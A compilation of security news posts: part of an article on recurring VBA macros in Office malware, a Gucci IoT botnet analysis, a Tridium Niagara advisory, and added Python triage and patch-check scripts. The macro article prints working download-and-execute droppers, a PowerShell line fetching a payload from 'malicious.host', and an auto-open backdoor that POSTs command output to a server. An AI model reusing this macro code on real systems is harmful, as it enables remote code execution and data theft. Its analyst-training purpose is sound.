    DownloadDLL
    Dim Str As String
    ' Quotes inside a VBA string literal must be doubled
    Str = "C:\Windows\System32\rundll32.exe " & Environ("TEMP") & "\powershdll.dll,main . { Invoke-WebRequest -useb ""YouWish"" } ^| iex;"
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    errReturn = objProcess.Create(Str, Null, objConfig, intProcessID)
End Sub


Sub DownloadDLL()
    Dim dll_Local As String
    dll_Local = Environ("TEMP") & "\powershdll.dll"
    If Not Dir(dll_Local, vbDirectory) = vbNullString Then
        Exit Sub
    End If
    
    Dim dll_URL As String
    #If Win64 Then
        dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x64/Release/PowerShdll.dll"
    #Else
        dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x86/Release/PowerShdll.dll"
    #End If
    
    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", dll_URL, False
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile dll_Local
        oStream.Close
    End If
End Sub

Or, if you have direct access to PowerShell.exe, you might use a simple inline script like the following one. This is quite common in today’s Office droppers as well.

Simple PowerShell Drop and Execute External Program

powershell  (New-Object System.Net.WebClient).DownloadFile('http://malicious.host:5000/payload.exe','microsoft.exe');Start-Process 'microsoft.exe';exit;

By applying those techniques (HTTP and execute commands) you might decide to run commands on the victim machine, such as having a backdoor. Actually I did see this code a few times related to manual attacks back in 2017. The code below comes from the great work made by sevagas.


Dim serverUrl As String

' Auto generate at startup
Sub Workbook_Open()
    Main
End Sub

Sub AutoOpen()
    Main
End Sub

Private Sub Main()
    Dim msg As String
    serverUrl = "<<<TEMPLATE>>>"
    msg = "<<<TEMPLATE>>>"
    On Error GoTo byebye
    msg = PlayCmd(msg)
    SendResponse msg
    On Error GoTo 0
byebye:
End Sub

' Send data using HTTP POST
' Note: WinHttpRequestOption_SslErrorIgnoreFlags = 4
' See https://msdn.microsoft.com/en-us/library/windows/desktop/aa384108(v=vs.85).aspx
Private Function HttpPostData(URL As String, data As String)
    ' data must have the form "var1=value1&var2=value2&var3=value3"
    Dim objHTTP As Object
    Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
    objHTTP.Option(4) = 13056 ' Ignore cert errors because of self-signed cert
    objHTTP.Open "POST", URL, False
    objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
    objHTTP.SetTimeouts 2000, 2000, 2000, 2000
    objHTTP.send (data)
    HttpPostData = objHTTP.responseText
End Function

' Returns target ID
Private Function GetId() As String
    Dim myInfo As String
    Dim myID As String
    myID = Environ("COMPUTERNAME") & " " & Environ("OS")
    GetId = myID
End Function

' Send the response for a command
Private Function SendResponse(cmdOutput)
    Dim data As String
    Dim response As String
    data = "id=" & GetId & "&cmdOutput=" & cmdOutput
    SendResponse = HttpPostData(serverUrl, data)
End Function

' Run any command line and return its output
Private Function PlayCmd(sCmd As String) As String
    ' Run a shell command, returning the output as a string
    ' Using a hidden window, pipe the output of the command to the CLIP.EXE utility...
    ' Necessary because normal usage with oShell.Exec("cmd.exe /C " & sCmd) always pops a window
    Dim instruction As String
    instruction = "cmd.exe /c " & sCmd & " | clip"
    CreateObject("WScript.Shell").Run instruction, 0, True
    ' Read the clipboard text using the htmlfile object
    PlayCmd = CreateObject("htmlfile").ParentWindow.ClipboardData.GetData("text")
End Function

You will probably never see these exact codes as described here, but you will likely find many similarities with the Macros you are analysing or will analyse in your next MalDoc analyses. Just remember that on one hand attackers love to re-use code, but on the other hand they really like to customize it. In your next VBA Macro analysis keep these stereotypes in mind and speed up your analysis.
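The stereotypes above (an auto-exec entry point, an HTTP client object, ADODB.Stream to write the payload, WScript.Shell or Win32_Process to run it, the 13056 certificate-error flag, a Dir() re-infection check, and the clip/ClipboardData trick for command output) can be turned into a quick triage pass over macro source. The following is an added example, my own code rather than anything from Marco Ramilli's post or from a tool such as olevba; the category names, regular expressions and verdict rules are my own choices, and the four macro samples are constructed snippets that echo the idioms shown above with placeholder URLs. In practice you would feed it VBA text extracted from a document with a macro-extraction tool.

```python
import re

# Indicator categories for the macro stereotypes described in the article.
# The category names, regexes and verdict rules are my own (hypothetical),
# not taken from the article or from any existing tool.
INDICATORS = {
    "autoexec": [r"\bAutoOpen\b", r"\bAuto_Open\b", r"\bWorkbook_Open\b", r"\bDocument_Open\b"],
    "http":     [r"MSXML2\.ServerXMLHTTP", r"WinHttp\.WinHttpRequest",
                 r"System\.Net\.WebClient", r"\bDownloadFile\b", r"Invoke-WebRequest"],
    "write":    [r"ADODB\.Stream", r"\bSaveToFile\b"],
    "execute":  [r"WScript\.Shell", r"Win32_Process", r"\brundll32(\.exe)?\b",
                 r"\bpowershell\b", r"\bShell\s*\(", r"\biex\b", r"Start-Process"],
    "evasion":  [r"\b13056\b", r"SslErrorIgnoreFlags", r"\bDir\s*\(", r"\bvbHidden\b"],
    "exfil":    [r"\|\s*clip\b", r"ClipboardData\.GetData", r'"POST"'],
}


def scan_macro(vba_source):
    """Return {category: [matched text, ...]} for every stereotype found in VBA source text."""
    hits = {}
    for category, patterns in INDICATORS.items():
        found = []
        for pat in patterns:
            m = re.search(pat, vba_source, re.IGNORECASE)  # VBA identifiers are case-insensitive
            if m:
                found.append(m.group(0))
        if found:
            hits[category] = found
    return hits


def classify(hits):
    """Map the categories present to the dropper stereotypes the article describes."""
    cats = set(hits)
    if {"http", "execute", "exfil"} <= cats:
        return "backdoor"   # command channel plus command output sent back
    if {"http", "execute"} <= cats:
        return "dropper"    # fetch (to disk or memory) followed by execution
    if "execute" in cats:
        return "launcher"   # runs something, no network stage seen
    if hits:
        return "suspicious"
    return "clean"


# Constructed samples modelled on the idioms in the article (not real captured macros).
SAMPLES = {
    "dropper": r'''
Private Sub DownloadAndExecute()
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP")
    WinHttpReq.setOption(2) = 13056 ' Ignore cert errors
    WinHttpReq.Open "GET", "https://example.com/mal.exe", False
    WinHttpReq.Send
    Set oStream = CreateObject("ADODB.Stream")
    oStream.SaveToFile localPath, 2
    CreateObject("WScript.Shell").Run localPath, 0
End Sub''',
    "powershdll": r'''
Sub RunDLL()
    Str = "C:\Windows\System32\rundll32.exe " & Environ("TEMP") & "\powershdll.dll,main . { Invoke-WebRequest -useb ""YouWish"" } ^| iex;"
    Set objProcess = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
    errReturn = objProcess.Create(Str, Null, objConfig, intProcessID)
End Sub''',
    "backdoor": r'''
Sub AutoOpen()
    Main
End Sub
Private Function HttpPostData(URL As String, data As String)
    Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
    objHTTP.Open "POST", URL, False
End Function
Private Function PlayCmd(sCmd As String) As String
    instruction = "cmd.exe /c " & sCmd & " | clip"
    CreateObject("WScript.Shell").Run instruction, 0, True
    PlayCmd = CreateObject("htmlfile").ParentWindow.ClipboardData.GetData("text")
End Function''',
    "benign": r'''
Sub FormatReport()
    Range("A1:D20").Font.Bold = True
    ActiveSheet.Columns.AutoFit
End Sub''',
}


def triage_all(samples=SAMPLES):
    """Scan every sample and return {name: (verdict, hits)}."""
    return {name: (classify(scan_macro(src)), scan_macro(src)) for name, src in samples.items()}


if __name__ == "__main__":
    for name, (verdict, hits) in triage_all().items():
        print(f"{name:<11} {verdict:<10} {sorted(hits)}")
```

The verdict is only a starting point for analysis: an obfuscated macro that builds the class names with Chr() or StrReverse() will not match these literal patterns, which is exactly why the article stresses getting past the obfuscation layer first.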

The original post is available on Marco Ramilli’s blog:

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have an MD in computer engineering and a PhD in computer security from the University of Bologna. During my PhD program I worked for the US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive research in malware evasion techniques and penetration testing of electronic voting systems.

I do have experience in security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been in charge of testing the uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cyber security experiences by diving into SCADA security issues with some of the biggest industrial agglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cyber security defence centers I’ve ever experienced! Now I technically lead Yoroi defending our customers, strongly believing in: Defence Belongs To Humans

Pierluigi Paganini

(SecurityAffairs – VBA macros, Office malware)

The post Frequent VBA Macros used in Office Malware appeared first on Security Affairs.

Gucci IOT Bot Discovered Targeting European Region

Security Labs discovered a new IOT bot named “GUCCI”. It seems like the IOT botnet is named after an Italian luxury brand of fashion and leather goods.

Analysis

The discovery came about during our reconnaissance and intelligence collection process. The IoT threat detection engine picked up the infection IP shown below, hosting a number of binaries for different architectures.

Figure 1: GUCCI Bot Binaries

All the bins were successfully downloaded and magic headers were analyzed to check the type of file. Figure 2 highlights how the GUCCI bot binaries are compiled.

Figure 2:  Bot: compiled Binaries

As you can see from the output in Figure 2, all the Gucci bot binaries are “stripped”. This means that when these binaries were compiled all the debug symbols were removed from the executables to reduce their size. Listing 1 lists the MD5 hashes of the binaries analyzed.

MD5 (arm)  = b24e88da025e2e2519a96dd874e6ba8b
MD5 (arm5) = 24ef4178e365c902cfdd53d0ea0d1dc2
MD5 (arm6) = 5a5a27635570b2c3634cab62beadc951
MD5 (arm7) = c1ef67719e9762fc46aeb28a064fe0ae
MD5 (m68k) = 2b984677ab9ee264a2dae90ca994a2a6
MD5 (mips) = a0e0da3ae1ad1b94f0626c3e0cb311ad
MD5 (mpsl) = ee26f791f724f92c02d976b0c774290d
MD5 (ppc)  = e16f594cbdd7b82d74f9abc65e0fe677
MD5 (sh4)  = a70d246e911fe52638595ea97ed07342
MD5 (spc)  = d1b719ab9b7be08ea418b47492108dfa
MD5 (x86)  = de94d4718127959a494fe8fbc4aa5b2a

Listing 1: MD5 Hashes of the Gucci Bot Binaries
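The checks behind Figure 2 and Listing 1 (identify each binary's file type and target architecture from its magic header, decide whether it is stripped, and record its MD5) are a routine first step when a drop site serves one build per architecture. The following is an added example, my own code and not part of the SecNiche analysis: a Python triage helper that parses the ELF header and section table directly, treating a binary as stripped when it has no SHT_SYMTAB section (the same criterion the file utility uses). Because the real Gucci binaries are not reproduced here, the script builds constructed minimal ELF images for the architectures the listing names; the hashes it prints are therefore hashes of those constructed images, not the ones in Listing 1.

```python
import hashlib
import struct

# ELF constants from the ELF specification
ELF_MAGIC = b"\x7fELF"
SHT_SYMTAB = 2
MACHINES = {2: "sparc", 3: "x86", 4: "m68k", 8: "mips", 20: "ppc",
            40: "arm", 42: "sh4", 62: "x86_64"}


def parse_elf(blob):
    """Return (arch, endianness, stripped) for an ELF image; raise ValueError otherwise."""
    if blob[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    is64 = blob[4] == 2                      # EI_CLASS: 1 = ELF32, 2 = ELF64
    end = "<" if blob[5] == 1 else ">"       # EI_DATA: 1 = little-endian, 2 = big-endian
    # e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags,
    # e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    fmt = end + ("HHIQQQIHHHHHH" if is64 else "HHIIIIIHHHHHH")
    fields = struct.unpack_from(fmt, blob, 16)
    machine, shoff, shentsize, shnum = fields[1], fields[5], fields[10], fields[11]
    stripped = True
    for i in range(shnum):
        # sh_type is the second 4-byte field of every section header in both layouts
        sh_type = struct.unpack_from(end + "I", blob, shoff + i * shentsize + 4)[0]
        if sh_type == SHT_SYMTAB:
            stripped = False
            break
    arch = MACHINES.get(machine, "unknown(%d)" % machine)
    if arch == "mips" and end == "<":
        arch = "mpsl"                        # little-endian MIPS, as the listing names it
    return arch, ("little" if end == "<" else "big"), stripped


def build_sample_elf(machine, little_endian=True, is64=False, with_symtab=False):
    """Constructed minimal ELF image (header plus section table only) for exercising parse_elf."""
    end = "<" if little_endian else ">"
    ehsize, shentsize, phentsize = (64, 64, 56) if is64 else (52, 40, 32)
    types = [0] + ([SHT_SYMTAB] if with_symtab else [])   # index 0 is the mandatory null header
    ident = ELF_MAGIC + bytes([2 if is64 else 1, 1 if little_endian else 2, 1, 0]) + b"\x00" * 8
    hdr_fmt = end + ("HHIQQQIHHHHHH" if is64 else "HHIIIIIHHHHHH")
    hdr = struct.pack(hdr_fmt, 2, machine, 1, 0, 0, ehsize, 0,
                      ehsize, phentsize, 0, shentsize, len(types), 0)
    sh_fmt = end + ("IIQQQQIIQQ" if is64 else "IIIIIIIIII")
    shdrs = b"".join(struct.pack(sh_fmt, 0, t, 0, 0, 0, 0, 0, 0, 0, 0) for t in types)
    return ident + hdr + shdrs


def triage(samples):
    """samples: {name: bytes}. Return one row per binary with hash, arch, endianness, strip status."""
    rows = []
    for name, blob in sorted(samples.items()):
        arch, endian, stripped = parse_elf(blob)
        rows.append({"name": name, "md5": hashlib.md5(blob).hexdigest(),
                     "arch": arch, "endian": endian, "stripped": stripped})
    return rows


# Constructed sample set mirroring the architectures in the listing (not the real binaries).
SAMPLES = {
    "arm":  build_sample_elf(40),
    "m68k": build_sample_elf(4, little_endian=False),
    "mips": build_sample_elf(8, little_endian=False),
    "mpsl": build_sample_elf(8),
    "ppc":  build_sample_elf(20, little_endian=False),
    "sh4":  build_sample_elf(42),
    "spc":  build_sample_elf(2, little_endian=False),
    "x86":  build_sample_elf(3),
    "x86_64_debug": build_sample_elf(62, is64=True, with_symtab=True),
}

if __name__ == "__main__":
    for row in triage(SAMPLES):
        state = "stripped" if row["stripped"] else "not stripped"
        print("%-13s %-7s %-6s %-12s %s" % (row["name"], row["arch"], row["endian"], state, row["md5"]))
```

Checking the section table rather than trusting the file name matters with multi-architecture drop sites: the name the operator gives a binary is under the operator's control, while e_machine and the symbol table are what the loader and the reverse engineer actually have to work with.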

The binaries were found to be obfuscated. On further analysis, the Gucci bot was seen connecting to the remote IP on TCP port 5555 and transmitting data. Digging deeper, we found that the remote host was running a custom telnet service on TCP port 5555 and exchanging commands with Gucci bots regularly. When a test connection was initiated to TCP port 5555 on the remote IP using a telnet client, the connection was accepted and credentials were requested.

Compromising C&C

Without authentication credentials it was not possible to access the service. Considering all scenarios, automated brute force and account cracking attempts were performed. The account credentials were successfully cracked, and a connection was initiated and accepted.

Figure 3 shows that the Gucci bot Command and Control panel was hijacked and privileged access was obtained.

Figure 3: Gucci C&C Bot Panel

The C&C listed the different types of Denial of Service (DoS) attack supported by the Gucci bot. The supported attack types are:

  • HTTP null scan
  • UDP flood
  • Syn flood
  • ACK flood
  • UDP flood with less protocol options
  • GRE IP flood
  • Value Source Engine specific flood

It was noticed that the Gucci bot was in the early stages of deployment. It was also observed that the botnet operator was monitoring all access connections to the Gucci C&C. As soon as the botnet operator realized that the C&C had been compromised, the TCP service was removed from the host, and the operator cleaned the directories and performed an additional set of operations to hide indicators and artefacts. The binaries were distributed from the location shown in Figure 4.

Figure 4: Gucci Bot – Source of Distribution

Inference

A new IoT bot, Gucci, has been discovered and analyzed. The botnet operator was found to be very proactive; the whole analysis and obtaining C&C access was like an arms race. The purpose of this research is to share the discovery details with the security research community so that the extracted intelligence can be used to fingerprint, detect and prevent Gucci bot infections. It is anticipated that the Gucci botnet is still active and targeting the European region. However, the attacks triggered by the Gucci bot could be broad-based or targeted depending on the operator’s requirements.

About the authors:

Aditya K Sood is a cyber security expert who has been working in the field for more than 11 years. His work can be found at: https://adityaksood.com;

Rohit Bansal is a Principal Security Researcher at SecNiche Security Labs

Pierluigi Paganini

(SecurityAffairs – malware, botnet)

The post Gucci IOT Bot Discovered Targeting European Region appeared first on Security Affairs.

Tridium Niagara framework affected by 2 flaws in BlackBerry QNX OS

Tridium’s Niagara product is affected by two vulnerabilities in BlackBerry’s QNX operating system for embedded devices.

The U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) is warning of two vulnerabilities in Tridium’s Niagara product that reside in BlackBerry’s QNX operating system for embedded devices.

The flaws could be exploited by a local user to escalate their privileges.

The Niagara Framework is a universal software infrastructure developed by Tridium that allows building controls integrators, HVAC and mechanical contractors to build custom, web-enabled applications for accessing, automating and controlling smart devices in real time via a local network or over the Internet.

Tridium Niagara product

The Niagara framework is widely adopted, especially in the commercial facilities, government facilities, critical manufacturing and IT sectors.

The security flaws impact Niagara AX 3.8u4, 4.4u3 and 4.7u1.

The most severe vulnerability, tracked as CVE-2019-8998, is an information disclosure flaw related to the procfs service that can be exploited by a local attacker for privilege escalation.

The flaw was discovered by Johannes Eger and Fabian Ullrich of the Secure Mobile Networking Lab at TU Darmstadt in Germany and received a CVSS score of 7.8.

“This advisory addresses an information disclosure vulnerability leading to a potential local escalation of privilege in the default configuration of the procfs service (the /proc filesystem) on affected versions of the BlackBerry QNX Software Development Platform (QNX SDP) that could potentially allow a successful attacker to gain unauthorized access to a chosen process address space.” reads the advisory.

BlackBerry QNX confirmed that it is not aware of attacks exploiting the flaw in the wild.

The second vulnerability, tracked as CVE-2019-13528, is an improper authorization issue that could allow a specific utility to gain read access to privileged files.

“A specific utility may allow an attacker to gain read access to privileged files in the Niagara AX 3.8u4 (JACE 3e, JACE 6e, JACE 7, JACE-8000), Niagara 4.4u3 (JACE 3e, JACE 6e, JACE 7, JACE-8000), and Niagara 4.7u1 (JACE-8000, Edge 10).” reads the advisory.

This flaw was reported by Francisco Tacliad and it received a CVSS score of 4.4.

Tridium has released updates that address these vulnerabilities and recommends users update to the versions identified below:

  • Niagara AX 3.8u4:
    • OS Dist: 2.7.402.2
    • NRE Config Dist: 3.8.401.1
  • Niagara 4.4u3:
    • OS Dist: 4.4.73.38.1
    • NRE Config Dist: 4.4.94.14.1
  • Niagara 4.7u1:
    • OS Dist (JACE-8000): 4.7.109.16.1
    • OS Dist (Edge 10): 4.7.109.18.1
    • NRE Config Dist: 4.7.110.32.1
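Checking a fleet of JACE and Edge controllers against the fixed versions above is the practical follow-up to this advisory. The script below is an added example, not Tridium's own tooling: it encodes the fixed OS Dist and NRE Config Dist versions listed in the article, compares installed versions component by component as integers (a plain string comparison gets dotted versions such as 4.4.100.0.1 versus 4.4.73.38.1 wrong), and reports hosts that still need the update. The inventory records, host names and installed versions are constructed for the example.

```python
import re

# Minimum fixed versions from the Tridium advisory as quoted in the article above.
# For Niagara 4.7u1 the OS Dist depends on the hardware model.
REQUIRED_VERSIONS = {
    "Niagara AX 3.8u4": {"os_dist": "2.7.402.2", "nre_config_dist": "3.8.401.1"},
    "Niagara 4.4u3": {"os_dist": "4.4.73.38.1", "nre_config_dist": "4.4.94.14.1"},
    "Niagara 4.7u1": {
        "os_dist": {"JACE-8000": "4.7.109.16.1", "Edge 10": "4.7.109.18.1"},
        "nre_config_dist": "4.7.110.32.1",
    },
}

_VERSION_RE = re.compile(r"^\d+(\.\d+)*$")


def parse_version(text):
    """Turn '4.4.94.14.1' into (4, 4, 94, 14, 1) so comparison is numeric per component."""
    if not _VERSION_RE.match(text):
        raise ValueError(f"not a dotted version: {text!r}")
    return tuple(int(part) for part in text.split("."))


def is_at_least(installed, required):
    # Tuple comparison is component-wise and a shorter prefix sorts before a longer one.
    return parse_version(installed) >= parse_version(required)


def required_version(release, component, model=None):
    """Look up the fixed version for a release and component, resolving the model where needed."""
    spec = REQUIRED_VERSIONS[release][component]
    if isinstance(spec, dict):
        if model not in spec:
            raise KeyError(f"no {component} fix listed for {release} on model {model!r}")
        return spec[model]
    return spec


def check_host(host):
    """host: dict with 'name', 'release', 'model', 'os_dist', 'nre_config_dist'.

    Returns a list of (component, installed, required, patched) tuples.
    """
    findings = []
    for component in ("os_dist", "nre_config_dist"):
        required = required_version(host["release"], component, host.get("model"))
        installed = host[component]
        findings.append((component, installed, required, is_at_least(installed, required)))
    return findings


def unpatched_hosts(inventory):
    """Names of hosts where at least one component is below its fixed version."""
    return sorted(h["name"] for h in inventory if not all(f[3] for f in check_host(h)))


# Constructed inventory: hypothetical hosts and installed versions, not from the article.
INVENTORY = [
    {"name": "jace8000-hq", "release": "Niagara 4.7u1", "model": "JACE-8000",
     "os_dist": "4.7.109.16.1", "nre_config_dist": "4.7.110.32.1"},     # exactly at the fix
    {"name": "edge10-lobby", "release": "Niagara 4.7u1", "model": "Edge 10",
     "os_dist": "4.7.109.9.1", "nre_config_dist": "4.7.110.32.1"},      # OS Dist below the fix
    {"name": "jace3e-plant", "release": "Niagara 4.4u3", "model": "JACE 3e",
     "os_dist": "4.4.100.0.1", "nre_config_dist": "4.4.94.14.1"},       # newer than the fix
]

if __name__ == "__main__":
    for host in INVENTORY:
        for component, installed, required, patched in check_host(host):
            state = "ok" if patched else "UPDATE"
            print(f"{host['name']:14} {component:16} {installed:>14} (need {required}) {state}")
    print("unpatched:", unpatched_hosts(INVENTORY))
```

Version strings on real controllers may carry suffixes that this regex rejects; failing loudly on an unexpected format is preferable to silently treating a host as patched.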

Pierluigi Paganini

(SecurityAffairs – Tridium, IoT)

The post Tridium Niagara framework affected by 2 flaws in BlackBerry QNX OS appeared first on Security Affairs.

Assessing risk: Measuring the health of your infosec environment

There is an uncomfortable truth that many organizations are not conducting comprehensive assessments of their information security risk; or those that do aren’t getting much value out of assessment exercises — because they simply don’t know how. Given the massive amounts of data organizations hold, accurately assessing these risks is difficult. So is determining how to best control them once they are identified. That’s especially needed for businesses in highly regulated industries that can face … More

The post Assessing risk: Measuring the health of your infosec environment appeared first on Help Net Security.